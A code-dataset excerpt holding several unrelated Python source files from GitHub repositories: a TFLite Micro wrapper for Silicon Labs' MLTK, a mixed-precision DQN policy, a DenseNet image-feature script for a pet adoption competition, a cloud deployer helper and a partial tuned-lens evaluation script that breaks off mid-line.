_model_lock = threading.Lock()\n _wrapper = None\n _logger:logging.Logger = None\n _logged_errors:List[str] = []\n _accelerators:Dict[str,TfliteMicroAccelerator] = {}\n _accelerator_paths:List[str] = []\n\n @staticmethod\n def git_hash() -> str:\n \"\"\"Return the GIT hash of the MLTK repo used to compile the wrapper library\"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.git_hash()\n\n @staticmethod\n def api_version() -> int:\n \"\"\"Return the TFLM API version number.\n This is used to ensure accelerator wrappers are compatible with\n this TFLM wrapper\"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.api_version()\n\n @staticmethod\n def set_log_level(level: str) -> str:\n \"\"\"Set the C++ wrapper logging level\n\n NOTE: This sets the level in the C++ wrapper, NOT the Python logger.\n Increasing the logging level can help with throughput as each\n log generated by the wrapper needs to be forwarded to the Python logger.\n\n Returns:\n The previous log level\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n prev_level = wrapper.get_log_level()\n if not wrapper.set_log_level(level):\n raise RuntimeError(f'Failed to set MLTK log level to {level}')\n return prev_level\n\n @staticmethod\n def get_log_level() -> str:\n \"\"\"Return the C++ wrapper's logging level\n\n NOTE: This returns the C++ wrapper's logging level, NOT the Python logger.\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n return wrapper.get_log_level()\n\n @staticmethod\n def set_logger(logger: logging.Logger):\n \"\"\"Set the wrapper's Python logger\n\n This logger will be invoked by the C++ wrapper's logging callback.\n \"\"\"\n TfliteMicro._logger = logger\n\n @staticmethod\n def get_logger() -> logging.Logger:\n \"\"\"Return the wrapper's Python logger\"\"\"\n # Just use the MLTK logger if no logger has been specified\n if TfliteMicro._logger is None:\n logger = get_mltk_logger()\n TfliteMicro._logger = logger\n\n return TfliteMicro._logger\n\n @staticmethod\n def normalize_accelerator_name(accelerator:str) -> str:\n \"\"\"Given a case-insensitive accelerator name, normalize\n the name to the format used by the C++ library\n\n Returns:\n Normalized name of accelerator or None if accelerator\n is unknown\n \"\"\"\n TfliteMicro._load_wrapper()\n if accelerator is None:\n return None\n\n return get_case_insensitive(accelerator, TfliteMicro._accelerators)\n\n @staticmethod\n def get_supported_accelerators() -> List[str]:\n \"\"\"Return a list of supported accelerators by name\"\"\"\n TfliteMicro._load_wrapper()\n return [x for x in TfliteMicro._accelerators]\n\n @staticmethod\n def accelerator_is_supported(accelerator:str) -> bool:\n \"\"\"Return if the given accelerator is supported\"\"\"\n TfliteMicro._load_wrapper()\n return get_case_insensitive(accelerator, TfliteMicro._accelerators) is not None\n\n\n @staticmethod\n def load_tflite_model(\n model: Union[str, TfliteModel],\n accelerator:str=None,\n enable_profiler=False,\n enable_tensor_recorder=False,\n force_buffer_overlap=False,\n runtime_buffer_size=0,\n **kwargs\n ) -> TfliteMicroModel:\n \"\"\"Load the TF-Lite Micro interpreter with the given .tflite model\n\n NOTE:\n - Only 1 model may be loaded at a time\n - You must call unload_model() when the model is no longer needed\n\n \"\"\"\n wrapper = TfliteMicro._load_wrapper()\n\n if accelerator is not None:\n tflm_accelerator = TfliteMicro.get_accelerator(accelerator)\n if hasattr(tflm_accelerator, 'init_variant'):\n tflm_accelerator.init_variant()\n else:\n tflm_accelerator = None\n\n TfliteMicro._model_lock.acquire()\n try:\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicroModel(\n tflm_wrapper=wrapper,\n tflm_accelerator=tflm_accelerator,\n flatbuffer_data=tflite_model.flatbuffer_data,\n enable_profiler=enable_profiler,\n enable_tensor_recorder=enable_tensor_recorder,\n force_buffer_overlap=force_buffer_overlap,\n runtime_buffer_size=runtime_buffer_size,\n )\n except:\n # Release the model lock if an exception occurred while loading it\n TfliteMicro._model_lock.release()\n raise\n\n return tflm_model\n\n @staticmethod\n def unload_model(model: TfliteMicroModel):\n \"\"\"Unload a previously loaded model\"\"\"\n accelerator = model.accelerator\n if accelerator is not None:\n if hasattr(accelerator, 'deinit_variant'):\n accelerator.deinit_variant()\n\n del model\n TfliteMicro._model_lock.release()\n\n\n\n @staticmethod\n def profile_model(\n model: Union[str, TfliteModel],\n accelerator:str=None,\n return_estimates=False,\n disable_simulator_backend=False,\n runtime_buffer_size=-1, # If runtime_buffer_size not given, determine the optimal memory size\n input_data: Union[np.ndarray,List[np.ndarray]]=None,\n **kwargs\n ) -> ProfilingModelResults:\n \"\"\"Profile the given model in the simulator and optionally determine metric estimates\n\n \"\"\"\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicro.load_tflite_model(\n model=tflite_model,\n accelerator=accelerator,\n enable_profiler=True,\n runtime_buffer_size=runtime_buffer_size\n )\n try:\n renable_simulator_backend = False\n disable_calculate_accelerator_cycles_only = False\n tflm_accelerator = tflm_model.accelerator\n\n if disable_simulator_backend and \\\n tflm_accelerator is not None and \\\n hasattr(tflm_accelerator, 'set_simulator_backend_enabled'):\n renable_simulator_backend = True\n tflm_accelerator.set_simulator_backend_enabled(False)\n\n if hasattr(tflm_accelerator, 'set_calculate_accelerator_cycles_only_enabled'):\n # For profiling, we only need the accelerator cycles\n # The simulator does not need to actually calculate valid output data\n # This greatly improves simulation latency\n disable_calculate_accelerator_cycles_only = True\n tflm_accelerator.set_calculate_accelerator_cycles_only_enabled(True)\n\n tflm_model_details = tflm_model.details\n\n if input_data is not None:\n if isinstance(input_data, list):\n for i, v in enumerate(input_data):\n tflm_model.input(index=i, value=v)\n else:\n tflm_model.input(value=input_data)\n else:\n for i in range(tflm_model.input_size):\n input_tensor = tflm_model.input(i)\n empty_tensor = np.zeros_like(input_tensor)\n tflm_model.input(i, value=empty_tensor)\n\n tflm_model.invoke()\n tflm_results = tflm_model.get_profiling_results()\n recorded_data = tflm_model.get_recorded_data()\n\n if renable_simulator_backend:\n tflm_accelerator.set_simulator_backend_enabled(True)\n if disable_calculate_accelerator_cycles_only:\n tflm_accelerator.set_calculate_accelerator_cycles_only_enabled(False)\n\n layer_results = []\n for layer_index, (tflm_layer_result, recorded_layer_data) in enumerate(zip(tflm_results, recorded_data)):\n layer_err = tflm_model.get_layer_error(layer_index)\n layer_err_msg = None if layer_err is None else layer_err.msg\n del tflm_layer_result['name']\n layer_result = ProfilingLayerResult(\n tflite_layer=tflite_model.layers[layer_index],\n error_msg=layer_err_msg,\n **tflm_layer_result\n )\n layer_result.update(recorded_layer_data)\n layer_results.append(layer_result)\n\n finally:\n TfliteMicro.unload_model(tflm_model)\n\n results = ProfilingModelResults(\n model=tflite_model,\n accelerator=accelerator,\n runtime_memory_bytes=tflm_model_details.runtime_memory_size,\n layers=layer_results\n )\n\n\n # If we want to return estimates for metrics like:\n # CPU cycles and energy\n if return_estimates:\n # If accelerator=none\n # then just use the MVP accelerator's 'none' (i.e. CMSIS-only) estimators\n if tflm_accelerator is None and 'MVP' in TfliteMicro._accelerators:\n tflm_accelerator = TfliteMicro._accelerators['MVP']\n\n if tflm_accelerator is not None:\n tflm_accelerator.estimate_profiling_results(\n results=results,\n **kwargs\n )\n\n return results\n\n\n @staticmethod\n def record_model(\n model: Union[str, TfliteModel],\n input_data: Union[np.ndarray,List[np.ndarray]]=None,\n accelerator:str=None,\n enable_accelerator_recorder = False,\n disable_simulator_backend=False,\n return_model_details=False\n ) -> Union[List[TfliteLayer], Tuple[List[TfliteLayer],TfliteMicroModelDetails]]:\n \"\"\"Run one inference and record each model layer's input/output tensors\n\n Args:\n model: path to .tflite model file or TfliteModel instance\n input_data: Model input0 data as numpy array or list of numpy arrays for each model input\n accelerator: Optional accelerator to use for inference\n enable_accelerator_recorder: If enabled, record the data/instructions generated by the hardware accelerator\n The recorded data with be stored in each layers' metadata property, .e.g.: ``layer.metadata['accelerator_data']``.\n Each layers' recorded data is a dictionary with the entries specific to the hardware accelerator.\n disable_simulator_backend: Disable the simulator backend while running the accelerator recorder.\n This can greatly improve execution time, however, the generated data output (i.e. output tensors) is invalid\n return_model_details: Also return the recorded model's TfliteMicroModelDetails\n Return:\n Return a list of TfliteLayers with the tensor data\n updated with the recorded values from the previous inference\n \"\"\"\n tflite_model = _load_tflite_model(model)\n tflm_model = TfliteMicro.load_tflite_model(\n model=tflite_model,\n accelerator=accelerator,\n enable_tensor_recorder=True,\n enable_profiler=False,\n runtime_buffer_size=16*1024*1024 # 16MB\n )\n\n reenable_simulator_backend = False\n if enable_accelerator_recorder:\n if tflm_model.accelerator is None:\n raise ValueError('Must provide accelerator when using enable_accelerator_recorder')\n if disable_simulator_backend and hasattr(tflm_model.accelerator, 'set_simulator_backend_enabled'):\n reenable_simulator_backend = True\n tflm_model.accelerator.set_simulator_backend_enabled(False)\n\n tflm_model.accelerator.enable_program_recorder()\n\n\n try:\n if input_data is not None:\n if isinstance(input_data, list):\n for i, v in enumerate(input_data):\n tflm_model.input(index=i, value=v)\n else:\n tflm_model.input(value=input_data)\n\n tflm_model.invoke()\n recorded_data = tflm_model.get_recorded_data()\n\n if reenable_simulator_backend:\n tflm_model.accelerator.set_simulator_backend_enabled(True)\n\n retval = []\n\n for layer_index, recorded_layer_data in enumerate(recorded_data):\n # pylint: disable=protected-access\n tf_layer = copy.deepcopy(tflite_model.layers[layer_index])\n retval.append(tf_layer)\n\n layer_err = tflm_model.get_layer_error(layer_index)\n tf_layer.metadata['error_msg'] = None if layer_err is None else layer_err.msg\n\n for input_index, input_bytes in enumerate(recorded_layer_data['inputs']):\n if input_index >= tf_layer.n_inputs:\n break\n input_tensor = tf_layer.inputs[input_index]\n if input_tensor is None:\n continue\n input_buf = np.frombuffer(input_bytes, dtype=input_tensor.dtype)\n if input_tensor.shape.flat_size > 0:\n tf_layer.inputs[input_index]._data = np.reshape(input_buf, newshape=input_tensor.shape)\n else:\n tf_layer.inputs[input_index]._data = input_buf\n\n for output_index, output_bytes in enumerate(recorded_layer_data['outputs']):\n output_tensor = tf_layer.outputs[output_index]\n output_buf = np.frombuffer(output_bytes, dtype=output_tensor.dtype)\n if output_tensor.shape.flat_size > 0:\n tf_layer.outputs[output_index]._data = np.reshape(output_buf, newshape=output_tensor.shape)\n else:\n tf_layer.outputs[output_index]._data = output_buf\n\n for key, value in recorded_layer_data.items():\n if key not in ('inputs', 'outputs'):\n tf_layer.metadata[key] = value\n\n if return_model_details:\n model_details = tflm_model.details\n finally:\n TfliteMicro.unload_model(tflm_model)\n\n if return_model_details:\n return retval, model_details\n\n return retval\n\n\n @staticmethod\n def add_accelerator_path(path:str):\n \"\"\"Add an accelerator search path\"\"\"\n TfliteMicro._accelerator_paths.append(path)\n\n\n @staticmethod\n def register_accelerator(accelerator:TfliteMicroAccelerator):\n \"\"\"Register a TFLM accelerator instance\"\"\"\n try:\n acc_api_version = accelerator.api_version\n except Exception as e:\n # pylint:disable=raise-missing-from\n raise RuntimeError(\n f'Failed to load accelerator: {accelerator.name}, ' + \\\n f'failed to retrieve api version from wrapper, err: {e}')\n\n tflm_api_version = TfliteMicro.api_version()\n if tflm_api_version != acc_api_version:\n raise RuntimeError(\n f'Accelerator: {accelerator.name} not compatible, ' + \\\n f'accelerator API version ({acc_api_version}) != TFLM wrapper version ({tflm_api_version})'\n )\n\n for variant in accelerator.variants:\n if TfliteMicro.accelerator_is_supported(variant):\n raise RuntimeError(f'Accelerator \"{variant}\" has already been registered')\n\n acc = copy.deepcopy(accelerator)\n acc.active_variant = variant\n TfliteMicro._accelerators[variant] = acc\n\n\n @staticmethod\n def get_accelerator(name:str) -> TfliteMicroAccelerator:\n \"\"\"Return an instance to the specified accelerator wrapper\"\"\"\n\n TfliteMicro._load_wrapper()\n\n\n norm_accelerator = TfliteMicro.normalize_accelerator_name(name)\n if norm_accelerator is None:\n raise ValueError(f'Unknown accelerator: {name}. Known accelerators are: {\", \".join(TfliteMicro.get_supported_accelerators())}')\n\n return TfliteMicro._accelerators[norm_accelerator]\n\n\n @staticmethod\n def _load_wrapper():\n \"\"\"Load the TFLM C++ wrapper and return a refernce to the loaded module\"\"\"\n if TfliteMicro._wrapper is not None:\n return TfliteMicro._wrapper\n\n # Add this wrapper directory to the env PATH\n # This way, the wrapper DLL can find additional DLLs as necessary\n wrapper_dir = os.path.dirname(os.path.abspath(__file__))\n os.environ['PATH'] = wrapper_dir + os.pathsep + os.environ['PATH']\n if hasattr(os, 'add_dll_directory'):\n os.add_dll_directory(wrapper_dir)\n\n # Import the TFLM C++ python wrapper\n # For more details, see:\n # <mltk root>/cpp/tflite_micro_wrapper\n try:\n TfliteMicro._wrapper = importlib.import_module('mltk.core.tflite_micro._tflite_micro_wrapper')\n except (ImportError, ModuleNotFoundError) as e:\n append_exception_msg(e,\n f'Failed to import the tflite_micro_wrapper C++ shared library.\\n' \\\n 'If you built the MLTK from source then this could mean you need to re-build the mltk package (e.g. \"pip install -e .\").\\n' \\\n 'If you\\'re running from a pre-built MLTK package (e.g. \"pip install silabs-mltk\"),\\n' \\\n f'ensure that the _tflite_micro_wrapper file exists at {wrapper_dir}.\\n' \\\n 'If the file does not exist, try installing, e.g.: pip install silabs-mltk --force-reinstall\\n\\n'\n )\n raise\n\n # Initialize the wrapper\n TfliteMicro._wrapper.init()\n\n # Set the callback that will be invoked by the C++ library\n # log messages\n TfliteMicro._wrapper.set_logger_callback(TfliteMicro._wrapper_logger_callback)\n\n TfliteMicro._load_accelerators()\n\n return TfliteMicro._wrapper\n\n\n @staticmethod\n def _load_accelerators():\n \"\"\"Load all the TFLM accelerators found in the search paths\"\"\"\n curdir = os.path.dirname(os.path.abspath(__file__))\n search_paths = []\n search_paths.extend(TfliteMicro._accelerator_paths)\n search_paths.extend(as_list(get_user_setting('accelerator_paths')))\n search_paths.append(f'{curdir}/accelerators/mvp')\n\n # Check if any \"<accelerator name>_mltk_accelerator.pth\" files are found in the Python Libs directory\n python_libs_dir = sysconfig.get_path('purelib')\n if os.path.exists(python_libs_dir):\n for fn in os.listdir(python_libs_dir):\n if not fn.endswith('_mltk_accelerator.pth'):\n continue\n pth_path = f'{python_libs_dir}/{fn}'\n with open(pth_path, 'r') as f:\n accelerator_package_base_dir = f.readline().strip()\n accelerator_name = fn[:-len('_mltk_accelerator.pth')]\n accelerator_dir = f'{accelerator_package_base_dir}/{accelerator_name}'\n\n # If the file does exist,\n # then add its path to the accelerator search path\n if os.path.exists(accelerator_dir):\n search_paths.append(accelerator_dir)\n elif os.path.exists(f'{accelerator_dir}_wrapper'):\n search_paths.append(f'{accelerator_dir}_wrapper')\n\n for search_path in search_paths:\n search_path = fullpath(search_path)\n init_py_path = f'{search_path}/__init__.py'\n if not os.path.exists(init_py_path):\n continue\n TfliteMicro._load_accelerator(search_path)\n\n TfliteMicro.register_accelerator(PlaceholderTfliteMicroAccelerator('cmsis'))\n\n\n\n @staticmethod\n def _load_accelerator(accelerator_dir:str) -> bool:\n \"\"\"Attempt to load an accelerator Python module in the given directory\"\"\"\n logger = TfliteMicro.get_logger()\n try:\n accelerator_module = import_module_at_path(accelerator_dir)\n except Exception as e:\n logger.debug(f'Failed to import {accelerator_dir}, err: {e}', exc_info=e)\n return False\n\n tflm_accelerator = None\n for key in dir(accelerator_module):\n value = getattr(accelerator_module, key)\n if inspect.isclass(value) and issubclass(value, TfliteMicroAccelerator):\n # Create an accelerator instance\n tflm_accelerator = value()\n break\n\n if tflm_accelerator is None:\n logger.debug(f'Accelerator module: {accelerator_dir} does not contain a TfliteMicroAccelerator class definition')\n return False\n\n try:\n TfliteMicro.register_accelerator(tflm_accelerator)\n except Exception as e:\n logger.warning(f'Failed to register accelerator: {accelerator_dir}, err: {e}')\n return False\n\n return True\n\n\n @staticmethod\n def _clear_logged_errors():\n \"\"\"Clear errors generated by C++ wrapper. This is used internally by the wrapper\"\"\"\n TfliteMicro._load_wrapper()\n TfliteMicro._logged_errors.clear()\n\n\n @staticmethod\n def _get_logged_errors() -> List[str]:\n \"\"\"Return errors generated by C++ wrapper as a list. This is used internally by the wrapper\"\"\"\n TfliteMicro._load_wrapper()\n return TfliteMicro._logged_errors\n\n\n @staticmethod\n def _get_logged_errors_str() -> str:\n \"\"\"Return errors generated by C++ wrapper as a string. This is used internally by the wrapper\"\"\"\n return \"\\n\".join(TfliteMicro._get_logged_errors())\n\n\n @staticmethod\n def _wrapper_logger_callback(msg: str):\n \"\"\" This callback will be invoked by the TFLM C++ wrapper\n when it internally issues a log msg\"\"\"\n l = TfliteMicro.get_logger()\n if l is None:\n return\n\n errs = TfliteMicro._logged_errors\n\n level = msg[:2].strip()\n msg = msg[2:].strip()\n\n if level == 'D':\n l.debug(msg)\n elif level == 'I':\n l.info(msg)\n elif level == 'W':\n l.warning(msg)\n errs.append(msg)\n elif level == 'E':\n l.error(msg)\n errs.append(msg)\n\n\ndef _load_tflite_model(model:Union[str,TfliteModel]) -> TfliteModel:\n if isinstance(model, TfliteModel):\n return model\n\n elif isinstance(model, str):\n if not model.endswith('.tflite') or not os.path.exists(model):\n raise ValueError('Provided model must be a path to an existing .tflite file')\n return TfliteModel.load_flatbuffer_file(model)\n else:\n raise RuntimeError('Must provide TfliteModel or path to .tflite file')\n","repo_name":"SiliconLabs/mltk","sub_path":"mltk/core/tflite_micro/tflite_micro.py","file_name":"tflite_micro.py","file_ext":"py","file_size_in_byte":23647,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"81"} +{"seq_id":"74593534985","text":"from contextlib import nullcontext\nfrom typing import Dict\n\nimport numpy as np\nfrom tianshou import policy\nfrom tianshou.data import Batch, to_torch_as\nimport torch\nfrom torch.cuda import amp\nfrom torch.optim import Optimizer\n\n\nclass DummyScaler(amp.GradScaler):\n def __init__(self): # pylint: disable=super-init-not-called\n pass\n\n def scale(self, outputs: torch.Tensor) -> torch.Tensor:\n return outputs\n\n def step(self, optimizer: Optimizer, *args, **kwargs):\n return optimizer.step()\n\n def update(self, new_scale=None):\n del new_scale\n\n\nclass DQNPolicy(policy.DQNPolicy):\n def __init__(self, *args, autocast: bool = False, **kwargs):\n super().__init__(*args, **kwargs)\n self.autocast = autocast\n if autocast:\n self.scaler = amp.GradScaler()\n else:\n self.scaler = DummyScaler()\n\n def learn(self, batch: Batch, **kwargs) -> Dict[str, float]:\n if self._target and self._iter % self._freq == 0:\n self.sync_weight()\n self.optim.zero_grad()\n weight = batch.pop(\"weight\", 1.0)\n autocast = amp.autocast() if self.autocast else nullcontext()\n with autocast:\n q = self(batch).logits\n q = q[np.arange(len(q)), batch.act]\n r = to_torch_as(batch.returns.flatten(), q)\n td = r - q\n loss = (td.pow(2) * weight).mean()\n batch.weight = td # prio-buffer\n self.scaler.scale(loss).backward()\n self.scaler.step(self.optim)\n self.scaler.update()\n self._iter += 1\n return {\"loss\": loss.item()}\n","repo_name":"bitsandscraps/QMIX","sub_path":"qmix/utils/autocast.py","file_name":"autocast.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"2361682384","text":"from utils import *\n\n\nwith timer('image'):\n train_image_files = sorted(glob.glob('../../input/petfinder-adoption-prediction/train_images/*.jpg'))\n test_image_files = sorted(glob.glob('../../input/petfinder-adoption-prediction/test_images/*.jpg'))\n image_files = train_image_files + test_image_files\n train_images = pd.DataFrame(image_files, columns=['image_filename'])\n train_images['PetID'] = train_images['image_filename'].apply(lambda x: x.split('/')[-1].split('-')[0])\n\nwith timer('densenet'):\n batch_size = 16\n pet_ids = train_images['PetID'].values\n img_pathes = train_images['image_filename'].values\n n_batches = len(pet_ids) // batch_size + 1\n\n inp = Input((256, 256, 3))\n backbone = DenseNet169(input_tensor=inp,\n weights='../../input/densenet-keras/DenseNet-BC-169-32-no-top.h5',\n include_top=False)\n x = backbone.output\n x = GlobalAveragePooling2D()(x)\n x = Lambda(lambda x: K.expand_dims(x, axis=-1))(x)\n x = AveragePooling1D(4)(x)\n out = Lambda(lambda x: x[:, :, 0])(x)\n m = Model(inp, out)\n\n features = []\n for b in range(n_batches):\n start = b * batch_size\n end = (b + 1) * batch_size\n batch_pets = pet_ids[start: end]\n batch_path = img_pathes[start: end]\n batch_images = np.zeros((len(batch_pets), img_size, img_size, 3))\n for i,(pet_id, path) in enumerate(zip(batch_pets, batch_path)):\n try:\n batch_images[i] = load_image(path)\n except:\n try:\n batch_images[i] = load_image(path)\n except:\n pass\n batch_preds = m.predict(batch_images)\n for i, pet_id in enumerate(batch_pets):\n features.append([pet_id] + list(batch_preds[i]))\n X = pd.DataFrame(features, columns=[\"PetID\"]+[\"dense169_{}\".format(i) for i in range(batch_preds.shape[1])])\n gp = X.groupby(\"PetID\").mean().reset_index()\n #train = pd.merge(train, gp, how=\"left\", on=\"PetID\")\n del m; gc.collect()\n pd.merge(train[[\"PetID\"]], gp, how=\"left\", on=\"PetID\").drop(\"PetID\", axis=1).to_feather(\"../feature/dense169.feather\")","repo_name":"okotaku/pet_finder","sub_path":"code/fe/26dense169.py","file_name":"26dense169.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"30748646966","text":"from . import cloud, default\nfrom .. import attributes as A\nfrom ..util import log\n\n\ndef get_stage_deployers(keys, stack):\n \"\"\"\n Returns a list of deployer objects that *create* cloud resources. Each\n member of the list is responsible for provisioning a single stack resource\n (e.g. a virtual server, a security group, a bucket, etc...).\n\n :param keys: A list of top-level configuration keys for which to create\n deployers.\n :type keys: :class:`~collections.Iterable`\n\n :param config: A stack object.\n :type config: :class:`~bang.stack.Stack`\n\n :rtype: :class:`list` of :class:`~bang.deployers.deployer.Deployer`\n\n \"\"\"\n config = stack.config\n creds = config[A.DEPLOYER_CREDS]\n deployers = []\n for res_type in keys:\n res_configs = config.get(res_type)\n if not res_configs:\n continue\n log.debug(\"Found config for resource type, %s\" % res_type)\n for res_config in res_configs:\n if A.PROVIDER in res_config:\n ds = cloud.get_deployers(res_config, res_type, stack, creds)\n else:\n ds = [default.ServerDeployer(stack, res_config)]\n if ds:\n deployers.extend(ds)\n return deployers\n","repo_name":"fr33jc/bang","sub_path":"bang/deployers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"40067786207","text":"\"\"\"Evaluation loop for the tuned lens model.\"\"\"\nimport json\nimport logging\nfrom collections import defaultdict\nfrom dataclasses import dataclass\nfrom itertools import islice\nfrom pathlib import Path\nfrom typing import Literal, Optional\n\nimport torch as th\nfrom simple_parsing import field\nfrom tqdm.auto import tqdm\nfrom transformers import PreTrainedModel\n\nfrom tuned_lens.nn.lenses import Lens, LogitLens, TunedLens\nfrom tuned_lens.scripts.ingredients import (\n Data,\n Distributed,\n Model,\n)\nfrom tuned_lens.stats import LogitStats\nfrom tuned_lens.utils import (\n maybe_all_reduce,\n pytree_map,\n pytree_stack,\n shift_labels,\n shift_preds,\n)\n\nLensType = Literal[\"logit\", \"tuned\"]\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _nested_dict():\n return defaultdict(_nested_dict)\n\n\n@dataclass\nclass Eval:\n \"\"\"Type hinting for CLI args.\"\"\"\n\n data: Data\n\n model: Model\n\n dist: Distributed\n\n output: Path = field(alias=[\"-o\"])\n \"\"\"Folder to save the eval results to.\"\"\"\n\n lens_name: Optional[str] = field(alias=[\"-l\"], default=None)\n \"\"\"Path to the tuned lens model to evaluate. Defaults to None.\"\"\"\n\n logit: bool = True\n \"\"\"Whether to evaluate the logit lens\"\"\"\n\n seed: int = 42\n \"\"\"Random seed used for data shuffling.\"\"\"\n\n tokens: Optional[int] = None\n \"\"\"Number of tokens to evaluate on. If None, will use the entire dataset.\"\"\"\n\n token_shift: int = field(default=1)\n \"\"\"How to shift the labels wrt the input tokens (1 = next token, 0 = current token,\n -1 = previous token, etc.)\"\"\"\n\n per_gpu_batch_size: int = 1\n \"\"\"Number of samples to try to fit on a GPU at once.\"\"\"\n\n layer_transfer: bool = field(action=\"store_true\")\n \"\"\"Evaluate the transfer of the lens to different layers of the transformer.\"\"\"\n\n record_logit_stats: bool = field(action=\"store_true\")\n \"\"\"Record the statistics of the marginal token distribution at each layer.\"\"\"\n\n def load_lens(self, model: PreTrainedModel) -> dict[str, Lens]:\n \"\"\"Load the tuned lens model.\"\"\"\n lenses = {}\n if self.logit:\n lenses[\"logit\"] = LogitLens.from_model(model)\n if self.lens_name is not None:\n lenses[\"tuned\"] = TunedLens.from_model_and_pretrained(model, self.lens_name)\n return lenses\n\n def calculate_batch_limit(self, tokens_per_sample: int):\n \"\"\"Calculate the total number of batches to evaluate on.\"\"\"\n assert self.tokens is not None\n global_batch_size = self.dist.world_size * self.per_gpu_batch_size\n tokens_per_batch = global_batch_size * tokens_per_sample\n return self.tokens // tokens_per_batch\n\n def _initialize_logit_stats_recorders(\n self, lenses: dict[str, Lens], total_layers: int\n ):\n if self.record_logit_stats:\n self.logit_stats_recorders = {\n lens_type: {f\"layer_{i}\": LogitStats() for i in range(total_layers)}\n for lens_type in lenses.keys()\n }\n self.logit_stats_recorder_final = LogitStats()\n else:\n self.logit_stats_recorders = None\n self.logit_stats_recorder_final = None\n\n def _record_logit_stats(self, logp: th.Tensor, layer: int, lens_type: str):\n if self.logit_stats_recorders is not None:\n self.logit_stats_recorders[lens_type][f\"layer_{layer}\"].update(\n logp, assume_normalized=True\n )\n\n def _record_logit_stats_final(self, logp: th.Tensor):\n if self.logit_stats_recorder_final is not None:\n self.logit_stats_recorder_final.update(logp, assume_normalized=True)\n\n def _save_logit_stats(self) -> defaultdict:\n logit_stats = _nested_dict()\n if self.logit_stats_recorders is not None:\n for lens_type, recorders in self.logit_stats_recorders.items():\n for layer, recorder in recorders.items():\n recorder.all_reduce_()\n logit_stats[lens_type][\"logit_stats\"][layer] = (\n recorder.marginal_probs.cpu().numpy().tolist()\n )\n\n if self.logit_stats_recorder_final is not None:\n self.logit_stats_recorder_final.all_reduce_()\n logit_stats[\"baseline\"][\"logit_stats\"][\"final\"] = (\n self.logit_stats_recorder_final.marginal_probs.cpu().numpy().tolist()\n )\n\n return logit_stats\n\n def _evaluate_lenses_on_hidden(\n self,\n lenses: dict[str, Lens],\n hidden: th.Tensor,\n layer: int,\n final_probs: th.Tensor,\n final_lps: th.Tensor,\n labels: th.Tensor,\n batch_output: defaultdict,\n total_layers: int,\n ):\n \"\"\"Evaluate a lens at a given layer. Batch output is modified in place.\n\n Args:\n lenses: The dictionary of lenses to evaluate on this hidden state.\n hidden: (batch x seq x d_model) The hidden states of the transformer.\n layer: The layer this hidden state is from.\n final_probs: (batch x seq x vocab) The final probabilities of\n the transformer.\n final_lps: (batch x seq x vocab) The final log probabilities\n of the transformer.\n labels: (batch x seq) The labels for the transformer.\n batch_output: Where to store the logging results.\n total_layers: The total number of layers in the transformer.\n logp_stats: where to record the logging results.\n \"\"\"\n for lens_type, lens in lenses.items():\n layer_name = f\"layer_{layer}\"\n lens_lps = lens(hidden, idx=layer).log_softmax(dim=-1)\n lens_probs = lens_lps.exp()\n\n self._record_logit_stats(lens_lps, layer, lens_type)\n\n batch_output[lens_type][\"ce\"][layer_name] = th.nn.functional.cross_entropy(\n shift_preds(lens_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n reduction=\"none\",\n )\n\n batch_output[lens_type][\"entropy\"][layer_name] = th.sum(\n -lens_probs * lens_lps, dim=-1\n )\n\n batch_output[lens_type][\"kl\"][layer_name] = th.sum(\n final_probs * (final_lps - lens_lps), dim=-1\n )\n\n if self.layer_transfer:\n for i in range(total_layers):\n trans_name = f\"layer_{i}\"\n transfer_lps = lens(hidden, idx=i).log_softmax(dim=-1)\n batch_output[lens_type][\"layer_transfer\"][\"ce\"][trans_name][\n layer_name\n ] = th.nn.functional.cross_entropy(\n shift_preds(transfer_lps, self.token_shift).flatten(0, 1),\n labels.flatten(),\n )\n batch_output[lens_type][\"layer_transfer\"][\"kl\"][trans_name][\n layer_name\n ] = th.sum(lens_probs * (lens_lps - transfer_lps), dim=-1).mean()\n\n @th.autocast(\"cuda\", enabled=th.cuda.is_available())\n @th.no_grad()\n def execute(self):\n \"\"\"Evaluates a TunedLens model against a transformer on a dataset.\"\"\"\n # Load model, tokenizer, data, and lens\n self.dist.init()\n model = tokenizer = data = lenses = nats_to_bpb = None\n\n # See comment in train_loop.py for why we do this\n load_device = self.dist.device if not self.dist.fsdp else None\n if self.dist.primary:\n # Let the primary processes populate the cache\n model, tokenizer = self.model.load(load_device)\n data, nats_to_bpb = self.data.load(tokenizer)\n lenses = self.load_lens(model)\n\n self.dist.barrier() # Wait for primary to finish filling the cache\n\n if not self.dist.primary:\n # Let the non-primary processes load from the cache\n model, tokenizer = self.model.load(load_device, must_use_cache=True)\n data, nats_to_bpb = self.data.load(tokenizer)\n lenses = self.load_lens(model)\n\n assert model and tokenizer and data and lenses and nats_to_bpb\n\n model = self.dist.shard_model(model)\n # Note since we are not training we can just move the lens to the device.\n # No need to use DDP\n lenses = {name: lens.to(self.dist.device) for name, lens in lenses.items()}\n dl = self.dist.dataloader(data)\n dl.seed(self.seed)\n\n for lens in lenses.values():\n lens.eval()\n\n if self.tokens is not None:\n tokens_per_sample = len(data[0][\"input_ids\"])\n batch_limit = self.calculate_batch_limit(tokens_per_sample)\n assert batch_limit > 0, \"Batch limit must be positive.\"\n dl = islice(dl, batch_limit)\n total = batch_limit\n else:\n total = len(data) // self.dist.world_size\n\n L = model.config.num_hidden_layers\n\n self._initialize_logit_stats_recorders(lenses, L)\n\n root_dir = self.output\n\n root_dir.mkdir(exist_ok=True, parents=True)\n\n batches = []\n\n self.dist.barrier()\n logger.info(\n f\"All processes initialized. Running evaluation on {total} batches.\"\n )\n\n pbar = tqdm(dl, desc=\"Evaluating\", 